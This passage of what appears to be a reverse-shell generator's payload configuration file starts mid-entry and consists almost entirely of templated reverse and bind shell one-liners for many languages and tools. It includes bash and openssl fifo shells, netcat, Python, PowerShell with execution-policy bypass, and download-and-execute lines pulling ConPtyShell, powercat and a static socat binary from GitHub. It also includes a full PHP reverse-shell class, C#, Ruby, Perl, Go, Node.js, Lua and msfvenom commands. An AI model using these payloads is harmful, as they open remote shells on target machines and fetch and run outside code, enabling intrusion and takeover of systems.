'echo -ne $RANDOM=;read 33 | k;case $k in '{password}'){shell_path} -l;esac' 2>&1|openssl s_client -quiet 34 | -connect {host}:{port} >/tmp/f 35 | Bash-p: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 36 | k;case $k in '{password}'){shell_path} -p;esac' 2>&1|openssl s_client -quiet 37 | -connect {host}:{port} >/tmp/f 38 | netcat: 39 | nc: "{binary_name} -e {shell_path} {host} {port}{nc_args}" 40 | nc-c: "{binary_name} {host} {port} -c {shell_path}{nc_args}" 41 | ncat: ncat -e {shell_path} {host} {port}{ncat_args} 42 | ncat-c: ncat -c {shell_path} {host} {port}{ncat_args} 43 | nc-mkfifo: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} 44 | {host} {port} >/tmp/f 45 | nc-mknod: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -i 2>&1|{binary_name} 46 | {host} {port} >/tmp/f 47 | DotnetCat: dncat -e {shell_path} {host} -p {port} 48 | 
netcat-windows: 49 | nc: "{binary_name} -e {shell_path} {host} {port}{nc_args}" 50 | nc-c: "{binary_name} {host} {port} -c {shell_path}{nc_args}" 51 | ncat: ncat -e {shell_path} {host} {port}{ncat_args} 52 | ncat-c: ncat -c {shell_path} {host} {port}{ncat_args} 53 | DotnetCat: dncat -e {shell_path} {host} -p {port} 54 | netcat-password: 55 | nc-c: nc -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} -i;esac' 56 | {host} {port} 57 | ncat-c: ncat -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 58 | -i;esac' {host} {port} 59 | nc-mkfifo: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 60 | k;case $k in '{password}')bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f 61 | nc-mknod: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|{shell_path} -c 'echo -ne $RANDOM=;read 62 | k;case $k in "{password}")bash -i;esac' 2>&1|{binary_name} {host} {port} >/tmp/f 63 | netcat-ssl: 64 | ncat: ncat -e {shell_path} {host} {port} --ssl 65 | ncat-c: ncat -c {shell_path} {host} {port} --ssl 66 | netcat-ssl-password: 67 | ncat-c: ncat --ssl -c 'echo -ne $RANDOM=;read k;case $k in '{password}'){shell_path} 68 | -i;esac' {host} {port} 69 | netcat-windows-password: 70 | ncat-c: '{binary_name}{ncat_args} -c "echo|set /p=%random%=&powershell $k=Read-Host;write-host 71 | $k=;if($k -eq ''{password}''){{{shell_path}}}" {host} {port}' 72 | telnet-linux: 73 | telnet: rm -f /tmp/p;mknod /tmp/p p && {binary_name} {host} {port} 0/tmp/p 74 | telnet-two_ports: "{binary_name} {host} {port}|{shell_path}|telnet {host} {port2}" 75 | openssl-linux: 76 | openssl: mkfifo /tmp/s;{shell_path} -i &1|{binary_name} s_client -quiet 77 | -connect {host}:{port}>/tmp/s;rm /tmp/s 78 | openssl-2: mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect 79 | {host}:{port} > fifo; rm fifo 80 | python: 81 | python: '{binary_name} -c "import socket,threading as t,subprocess as 
s;c=socket.socket();c.connect((''{host}'',{port}));p=s.Popen(''{shell_path}'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() 82 | for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) 83 | for _ in iter(int,1)],).start();p.wait()"' 84 | python-exec: '{binary_name} -c "exec(''import os,socket,threading as t,subprocess 85 | as s\ndef i():\n while 1:\n try:\n p.stdin.write(c.recv(1024).decode());p.stdin.flush()\n except:\n os._exit(0)\ndef 86 | j():\n while 1:\n try:c.send(p.stdout.read(1).encode())\n except:pass\nc=socket.socket()\np=s.Popen(\''{shell_path}\'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\nfor 87 | _ in range(9):\n try:\n c.connect((\''{host}\'',{port}));break\n except:\n pass\nt.Thread(target=i,).start();t.Thread(target=j,).start()\np.wait()'')"' 88 | python-pty: '{binary_name} -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((''{host}'',{port}));os.dup2(s.fileno(),0); 89 | os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(''{shell_path}'')"' 90 | python-pty-short: '{binary_name} -c "a=__import__;s=a(''socket'');o=a(''os'').dup2;p=a(''pty'').spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect((''{host}'',{port}));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p(''{shell_path}'')"' 91 | python-subprocess1: '{binary_name} -c "socket=__import__(''socket'');subprocess=__import__(''subprocess'');os=__import__(''os'');s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((''{host}'',{port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([''{shell_path}'',''-i''])"' 92 | python-subprocess2: '{binary_name} -c "a=__import__;b=a(''socket'').socket;p=a(''subprocess'').call;o=a(''os'').dup2;s=b();s.connect((''{host}'',{port}));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p([''{shell_path}'',''-i''])"' 93 | 
pwncat: pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args} 94 | python-windows: 95 | python: '{binary_name} -c "import socket,threading as t,subprocess as s;c=socket.socket();c.connect((''{host}'',{port}));p=s.Popen(''{shell_path}'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1);t.Thread(target=lambda:[p.stdin.flush() 96 | for _ in iter(int,1) if p.stdin.write(c.recv(1024).decode())],).start();t.Thread(target=lambda:[c.send(p.stdout.read(1).encode()) 97 | for _ in iter(int,1)],).start();p.wait()"' 98 | python-exec: '{binary_name} -c "exec(''import os,socket,threading as t,subprocess 99 | as s\ndef i():\n while 1:\n try:\n p.stdin.write(c.recv(1024).decode());p.stdin.flush()\n except:\n os._exit(0)\ndef 100 | j():\n while 1:\n try:c.send(p.stdout.read(1).encode())\n except:pass\nc=socket.socket()\np=s.Popen(\''{shell_path}\'',stdout=s.PIPE,stderr=s.STDOUT,stdin=s.PIPE,shell=1,universal_newlines=1)\nfor 101 | _ in range(9):\n try:\n c.connect((\''{host}\'',{port}));break\n except:\n pass\nt.Thread(target=i,).start();t.Thread(target=j,).start()\np.wait()'')"' 102 | pwncat: pwncat -e {shell_path} {host} {port} --reconn --reconn-wait 3{pwncat_args} 103 | powershell: 104 | powershell-1: '{binary_name} /nop /c "$client=New-Object System.Net.Sockets.TCPClient(''{host}'',{port});$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{{0}};while(($i=$stream.Read($bytes,0,$bytes.Length)) 105 | -ne 0){{;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex 106 | $data 2>&1|Out-String);$sendback2= $sendback+''PS ''+(pwd).Path+''>'';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()"' 107 | powershell-2: '{binary_name} /nop /noni /ep bypass /c "$TCPClient=New-Object Net.Sockets.TCPClient(''{host}'',{port});$NetworkStream=$TCPClient.GetStream();$StreamWriter=New-Object 108 | 
IO.StreamWriter($NetworkStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+''>'');$StreamWriter.Flush()}}WriteToStream'''';while(($BytesRead=$NetworkStream.Read($Buffer,0,$Buffer.Length)) 109 | -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer, 0,$BytesRead-1);$Output=try{{Invoke-Expression 110 | $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()"' 111 | powershell-ssl: '{binary_name} /nop /noni /ep bypass /c "$TCPClient=New-Object 112 | Net.Sockets.TCPClient(''{host}'',{port});$NetworkStream=$TCPClient.GetStream();$SslStream=New-Object 113 | Net.Security.SslStream($NetworkStream,$false,({{$true}} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient(''cloudflare-dns.com'',$null,$false);if(!$SslStream.IsEncrypted 114 | -or !$SslStream.IsSigned){{$SslStream.Close();exit}}$StreamWriter=New-Object 115 | IO.StreamWriter($SslStream);function WriteToStream($String){{[byte[]]$script:Buffer=0..$TCPClient.ReceiveBufferSize|%{{0}};$StreamWriter.Write($String+[System.Security.Principal.WindowsIdentity]::GetCurrent().Name+''>'');$StreamWriter.Flush()}};WriteToStream'''';while(($BytesRead=$SslStream.Read($Buffer,0,$Buffer.Length)) 116 | -gt 0){{$Command=([text.encoding]::UTF8).GetString($Buffer,0,$BytesRead-1);$Output=try{{Invoke-Expression 117 | $Command 2>&1|Out-String}}catch{{$_|Out-String}}WriteToStream($Output)}}$StreamWriter.Close()"' 118 | powershell-ConPty: '{binary_name} "IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 119 | -UseBasicParsing);Invoke-ConPtyShell {host} {port}"' 120 | powercat-Github-1: '{binary_name} "IEX(IWR https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat 121 | -c {host} -p {port} -e {shell_path}"' 122 | powercat-Github-2: '{binary_name} 
"IEX(curl https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1);powercat 123 | -c {host} -p {port} -e {shell_path}"' 124 | powercat-Github-3: '{binary_name} "IEX(New-Object System.Net.WebClient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat 125 | -c {host} -p {port} -e {shell_path}"' 126 | csharp: 127 | csharp-csc: echo using System;using System.IO;using System.Net;using System.Net.Sockets;using 128 | System.Text;using System.Diagnostics;public class i{{public static TcpClient 129 | c;public static NetworkStream s;public static StreamReader r;public static StreamWriter 130 | w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new 131 | StringBuilder();if(!c.Connected){{try{{c.Connect("{host}",{port});s=c.GetStream();r=new 132 | StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process 133 | h;h=new Process();h.StartInfo.FileName="{shell_path}";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new 134 | DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public 135 | static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder 136 | strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}}>%tmp%\0&&for,/f,%p,in,('where,/r,%systemroot%\Microsoft.NET\Framework,csc.exe'),do,%p 137 | /out:%tmp%\0.exe %tmp%\0&&%tmp%\0.exe&&del,/q %tmp%\0.exe %tmp%\0 138 | 
csharp-powershell-code: |- 139 | $j=get-random;$d=@" 140 | using System;using System.IO;using System.Net;using System.Net.Sockets;using System.Text;using System.Diagnostics;public class i$j{{public static TcpClient c;public static NetworkStream s;public static StreamReader r;public static StreamWriter w;public static StringBuilder u;public static void Main(){{c=new TcpClient();u=new StringBuilder();if(!c.Connected){{try{{c.Connect("{host}",{port});s=c.GetStream();r=new StreamReader(s,System.Text.Encoding.Default);w=new StreamWriter(s,System.Text.Encoding.Default);}}catch(Exception){{return;}}Process h;h=new Process();h.StartInfo.FileName="{shell_path}";h.StartInfo.UseShellExecute=false;h.StartInfo.RedirectStandardInput=true;h.StartInfo.RedirectStandardOutput=true;h.StartInfo.RedirectStandardError=true;h.OutputDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.ErrorDataReceived+=new DataReceivedEventHandler(SortOutputHandler);h.Start();h.BeginOutputReadLine();h.BeginErrorReadLine();while(true){{try{{u.Append(r.ReadLine());h.StandardInput.WriteLine(u);u.Remove(0,u.Length);}}catch(Exception){{r.Close();w.Close();h.Kill();break;}}}}}}}}public static void SortOutputHandler(object sendingProcess,DataReceivedEventArgs outLine){{StringBuilder strOutput=new StringBuilder();if(!String.IsNullOrEmpty(outLine.Data)){{try{{strOutput.Append(outLine.Data);w.WriteLine(strOutput);w.Flush();}}catch(Exception){{}}}}}}}} 141 | "@;Add-Type -TypeDefinition $d -Language CSharp;iex "[i$j]::Main()" 142 | php: 143 | php-exec: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});exec(''{shell_path} 144 | <&3 >&3 2>&3'');"' 145 | php-shell_exec: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});shell_exec(''{shell_path} 146 | <&3 >&3 2>&3'');"' 147 | php-system: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});system(''{shell_path} 148 | -i <&3 >&3 2>&3'');"' 149 | php-passthru: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});passthru(''{shell_path} 150 | -i <&3 
>&3 2>&3'');"' 151 | php-popen: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});popen(''{shell_path} 152 | -i <&3 >&3 2>&3",''r'');"' 153 | php-proc_open: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});$proc=proc_open(''{shell_path}'',array(0=>$sock,1=>$sock,2=>$sock),$pipes);"' 154 | php-backtick: '{binary_name} -r "$sock=fsockopen(''{host}'',{port});`{shell_path} 155 | <&3 >&3 2>&3`;"' 156 | php-code: 'array(''pipe'',''r''),1=>array(''pipe'',''w''),2=>array(''pipe'',''w''));private 158 | $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private 159 | function detect(){{$detected=true;if(stripos(PHP_OS,''LINUX'')!==false){{$this->os=''LINUX'';$this->s=''/bin/sh'';}}else 160 | if(stripos(PHP_OS,''WIN32'')!==false||stripos(PHP_OS,''WINNT'')!==false||stripos(PHP_OS,''WINDOWS'')!==false){{$this->os=''WINDOWS'';$this->s=''cmd.exe'';}}else{{$detected=false;}}return 161 | $detected;}}private function daemonize(){{$exit=false;if(!function_exists(''pcntl_fork'')){{}}else 162 | if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return 163 | $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private 164 | function dump($data){{$data=str_replace(''<'',''<'',$data);$data=str_replace(''>'',''>'',$data);}}private 165 | function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return 166 | $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return 167 | $bytes;}}private function rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os===''WINDOWS''&&$oname===''STDIN''){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private 168 | function 
brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat[''size''];if($this->os===''WINDOWS''&&$iname===''STDOUT''&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public 169 | function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo"{{$errno}}: 170 | {{$errstr}}";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes 171 | as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,"PID:{{$status[''pid'']}}");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else 172 | if(feof($pipes[1])||!$status[''running'']){{break;}}$streams=array(''read''=>array($socket,$pipes[1],$pipes[2]),''write''=>null,''except''=>null);$num_changed_streams=@stream_select($streams[''read''],$streams[''write''],$streams[''except''],0);if($num_changed_streams===false){{break;}}else 173 | if($num_changed_streams>0){{if($this->os===''LINUX''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(in_array($pipes[2],$streams[''read''])){{$this->rw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(in_array($pipes[1],$streams[''read''])){{$this->rw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}else 174 | 
if($this->os===''WINDOWS''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(($fstat=fstat($pipes[2]))&&$fstat[''size'']){{$this->brw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(($fstat=fstat($pipes[1]))&&$fstat[''size'']){{$this->brw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}}}}}while(!$this->error);foreach($pipes 175 | as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new 176 | S(''{host}'',{port});$sh->run();unset($sh);?>' 177 | php-windows: 178 | php: 'echo "array(''pipe'',''r''),1=>array(''pipe'',''w''),2=>array(''pipe'',''w''));private 180 | $buffer=1024;private $clen=0;private $error=false;public function __construct($addr,$port){{$this->addr=$addr;$this->port=$port;}}private 181 | function detect(){{$detected=true;if(stripos(PHP_OS,''LINUX'')!==false){{$this->os=''LINUX'';$this->s=''/bin/sh'';}}else 182 | if(stripos(PHP_OS,''WIN32'')!==false||stripos(PHP_OS,''WINNT'')!==false||stripos(PHP_OS,''WINDOWS'')!==false){{$this->os=''WINDOWS'';$this->s=''cmd.exe'';}}else{{$detected=false;}}return 183 | $detected;}}private function daemonize(){{$exit=false;if(!function_exists(''pcntl_fork'')){{}}else 184 | if(($pid=@pcntl_fork())<0){{}}else if($pid>0){{$exit=true;}}else if(posix_setsid()<0){{}}else{{}}return 185 | $exit;}}private function settings(){{@error_reporting(0);@set_time_limit(0);@umask(0);}}private 186 | function dump($data){{$data=str_replace(''<'',''<'',$data);$data=str_replace(''>'',''>'',$data);}}private 187 | function read($stream,$name,$buffer){{if(($data=@fread($stream,$buffer))===false){{$this->error=true;}}return 188 | $data;}}private function write($stream,$name,$data){{if(($bytes=@fwrite($stream,$data))===false){{$this->error=true;}}return 189 | $bytes;}}private function 
rw($input,$output,$iname,$oname){{while(($data=$this->read($input,$iname,$this->buffer))&&$this->write($output,$oname,$data)){{if($this->os===''WINDOWS''&&$oname===''STDIN''){{$this->clen+=strlen($data);}}$this->dump($data);}}}}private 190 | function brw($input,$output,$iname,$oname){{$fstat=fstat($input);$size=$fstat[''size''];if($this->os===''WINDOWS''&&$iname===''STDOUT''&&$this->clen){{while($this->clen>0&&($bytes=$this->clen>=$this->buffer?$this->buffer:$this->clen)&&$this->read($input,$iname,$bytes)){{$this->clen-=$bytes;$size-=$bytes;}}}}while($size>0&&($bytes=$size>=$this->buffer?$this->buffer:$size)&&($data=$this->read($input,$iname,$bytes))&&$this->write($output,$oname,$data)){{$size-=$bytes;$this->dump($data);}}}}public 191 | function run(){{if($this->detect()&&!$this->daemonize()){{$this->settings();$socket=@fsockopen($this->addr,$this->port,$errno,$errstr,30);if(!$socket){{echo"{{$errno}}: 192 | {{$errstr}}";}}else{{stream_set_blocking($socket,false);$process=@proc_open($this->s,$this->descriptorspec,$pipes,null,null);if(!$process){{}}else{{foreach($pipes 193 | as $pipe){{stream_set_blocking($pipe,false);}}$status=proc_get_status($process);@fwrite($socket,"PID:{{$status[''pid'']}}");do{{$status=proc_get_status($process);if(feof($socket)){{break;}}else 194 | if(feof($pipes[1])||!$status[''running'']){{break;}}$streams=array(''read''=>array($socket,$pipes[1],$pipes[2]),''write''=>null,''except''=>null);$num_changed_streams=@stream_select($streams[''read''],$streams[''write''],$streams[''except''],0);if($num_changed_streams===false){{break;}}else 195 | if($num_changed_streams>0){{if($this->os===''LINUX''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(in_array($pipes[2],$streams[''read''])){{$this->rw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(in_array($pipes[1],$streams[''read''])){{$this->rw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}else 196 | 
if($this->os===''WINDOWS''){{if(in_array($socket,$streams[''read''])){{$this->rw($socket,$pipes[0],''SOCKET'',''STDIN'');}}if(($fstat=fstat($pipes[2]))&&$fstat[''size'']){{$this->brw($pipes[2],$socket,''STDERR'',''SOCKET'');}}if(($fstat=fstat($pipes[1]))&&$fstat[''size'']){{$this->brw($pipes[1],$socket,''STDOUT'',''SOCKET'');}}}}}}}}while(!$this->error);foreach($pipes 197 | as $pipe){{fclose($pipe);}}proc_close($process);}}fclose($socket);}}}}}}}}$sh=new 198 | S(''{host}'',{port});$sh->run();unset($sh);?>"|{binary_name}' 199 | ruby-linux: 200 | ruby-spawn: '{binary_name} -rsocket -e"spawn(''{shell_path}'',[:in,:out,:err]=>TCPSocket.new(''{host}'',{port}))"' 201 | ruby-sprintf: '{binary_name} -rsocket -e"f=TCPSocket.open(''{host}'',{port}).to_i;exec 202 | sprintf(''{shell_path} -i <&%d >&%d 2>&%d'',f,f,f)"' 203 | ruby-new: '{binary_name} -rsocket -e "exit if fork;c=TCPSocket.new(''{host}'',{port});loop{{c.gets.chomp!;(exit! 204 | if $_==''exit'');($_=~/cd (.+)/i?(Dir.chdir($1)):(IO.popen($_,?r){{|io|c.print 205 | io.read}}))rescue c.puts ''failed: #{{$_}}''}}"' 206 | ruby-windows: '{binary_name} -rsocket -e "c=TCPSocket.new(''{host}'',''{port}'');while(cmd=c.gets);IO.popen({shell_path},''r''){{|io|c.print 207 | io.read}}end"' 208 | socat: 209 | socat: "{binary_name} {protocol}:{host}:{port} EXEC:{shell_path}{socat_args}" 210 | socat-tty: "{binary_name} {protocol}:{host}:{port} EXEC:'{shell_path}',pty,stderr,setsid,sigint,sane" 211 | socat-linux: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat 212 | -O /tmp/socat;chmod +x /tmp/socat;/tmp/socat exec:'{shell_path} -li',pty,stderr,setsid,sigint,sane 213 | {protocol}:{host}:{port} 214 | golang-linux: 215 | golang: echo 'package main;import"os/exec";import"net";func main(){{c,_:=net.Dial("tcp","{host}:{port}");cmd:=exec.Command("{shell_path}");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}'>/tmp/t.go 216 | &&{binary_name} run /tmp/t.go&&rm /tmp/t.go 217 | golang-windows: 218 | 
golang: echo package main;import"os/exec";import"net";func main(){{c,_:=net.Dial("tcp","{host}:{port}");cmd:=exec.Command("{shell_path}");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}}>%tmp%\0.go&{binary_name} 219 | run %tmp%\0.go&del %tmp%\0.go %tmp%\0 220 | perl-linux: 221 | perl: '{binary_name} -e ''use Socket;$i="{host}";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("{protocol}"));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("{shell_path} 222 | -i");}};''' 223 | perl-2: '{binary_name} -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{host}:{port}");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ 224 | while<>;''' 225 | perl-windows: 226 | perl: '{binary_name} -e "use Socket;$i=''{host}'';$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(''{protocol}''));if(connect(S,sockaddr_in($p,inet_aton($i)))){{open(STDIN,''>&S'');open(STDOUT,''>&S'');open(STDERR,''>&S'');exec(''{shell_path}'');}};"' 227 | perl-2: '{binary_name} -MIO -e "$c=new IO::Socket::INET(PeerAddr,''{host}:{port}'');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ 228 | while<>;"' 229 | java: 230 | java-jar: "{binary_name} -jar Reverse_Shell.jar {host} {port}" 231 | java-jar-github: wget -q https://raw.githubusercontent.com/ivan-sincek/java-reverse-tcp/main/jar/Reverse_Shell.jar 232 | -O 0&&java -jar 0 {host} {port}&&del 0||rm 0 233 | java-jar3: "{binary_name} -jar JavaStager-0.1-initial.jar http://attackerip/payload.java" 234 | java-jsp: https://github.com/tennc/webshell/blob/master/jsp/jsp-reverse.jsp 235 | java-jsp2: https://github.com/ivan-sincek/java-reverse-tcp/blob/main/jsp/reverse/jsp_reverse_shell.jsp 236 | java-jsp-msfvenom: msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} 237 | -f raw>reverse.jsp 238 | java-war-msfvenom: msfvenom -p java/jsp_shell_reverse_tcp LHOST={host} LPORT={port} 239 | -f war>reverse.war 240 | nodejs-linux: 241 | nodejs-async: echo 
'require("child_process").exec("{shell_path} -i >& /dev/tcp/{host}/{port} 242 | 0>&1")'|{binary_name} 243 | nodejs-sync: echo 'require("child_process").execSync("{shell_path} -i >& /dev/tcp/{host}/{port} 244 | 0>&1")'|{binary_name} 245 | nodejs-spawn: echo '!function(){{var e=require("net"),n=require("child_process"),r=n.spawn("{shell_path}",[]),t=new 246 | e.Socket;return t.connect({port},"{host}",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();'|{binary_name} 247 | nodejs-windows: 248 | nodejs-async: echo require('child_process').exec('nc -e {shell_path} {host} {port}')|{binary_name} 249 | nodejs-sync: echo require('child_process').execSync('nc -e {shell_path} {host} 250 | {port}')|{binary_name} 251 | nodejs-spawn: echo !function(){{var e=require("net"),n=require("child_process"),r=n.spawn("{shell_path}",[]),t=new 252 | e.Socket;return t.connect({port},"{host}",function(){{t.pipe(r.stdin),r.stdout.pipe(t),r.stderr.pipe(t)}}),/a/}}();|{binary_name} 253 | lua: 254 | lua5.1: lua5.1 -e 'local host, port = "{host}", {port} local socket = require("socket") 255 | local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while 256 | true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") 257 | local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break 258 | end end tcp:close()' 259 | lua-linux: '{binary_name} -e "require(''socket'');require(''os'');t=socket.tcp();t:connect(''{host}'',''{port}'');os.execute(''{shell_path} 260 | -i <&3 >&3 2>&3'');"' 261 | custom_payload_type: 262 | custom_payload_name: custom_payload_value 263 | bind: 264 | bash: 265 | bash-bind: rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} 266 | >/tmp/m 267 | netcat: 268 | nc: rm -f /tmp/m;mkfifo /tmp/m;cat /tmp/m|{shell_path} -i 2>&1|nc -l {port} >/tmp/m 269 | nc-e: "{binary_name} -Lnp {port} -e {shell_path}{nc_args}" 270 | ncat-e: ncat -lnp {port} -e {shell_path}{ncat_args} 271 | ncat-ssl: 
ncat -lnp {port} -e {shell_path} --ssl 272 | DotnetCat: dncat -lp {port} -e {shell_path} 273 | socat: 274 | socat: "{binary_name} -d -d {protocol}4-LISTEN:{port} EXEC:'{shell_path}'{socat_args}" 275 | socat-ssl: "{binary_name} OPENSSL-LISTEN:{port},cert=bind.pem,verify=0,fork EXEC:'{shell_path}'{socat_args}" 276 | python: 277 | python-bind: '{binary_name} -c "import subprocess as u;c=__import__(''socket'').socket();c.bind((''{host}'',{port}));c.listen(0);cc,a=c.accept();p=u.Popen([''{shell_path}''],stdin=u.PIPE,stdout=u.PIPE,stderr=u.STDOUT);r=__import__(''threading'').Thread(target=lambda:[cc.send(p.stdout.read(1024)) 278 | for _ in iter(int,1)],);r.start();[p.stdin.flush() for _ in iter(int, 1) if 279 | p.stdin.write(cc.recv(1024))]"' 280 | pwncat: pwncat -l {host} {port} -e {shell_path}{pwncat_args} 281 | perl-linux: 282 | perl-bind: '{binary_name} -e ''use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname("{protocol}"));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close 283 | C){{open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("{shell_path} 284 | -i");}};''' 285 | perl-windows: 286 | perl-bind: '{binary_name} -e "use Socket;$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(''{protocol}''));bind(S,sockaddr_in($p,INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close 287 | C){{open(STDIN,''>&C'');open(STDOUT,''>&C'');open(STDERR,''>&C'');exec(''{shell_path}'');}};"' 288 | golang: 289 | gotty-webshell: gotty {gotty_args}-w --reconnect {shell_path} 290 | custom_payload_type: 291 | custom_payload_name: custom_payload_value 292 | -------------------------------------------------------------------------------- /rcX-png/favicon.ico: -------------------------------------------------------------------------------- 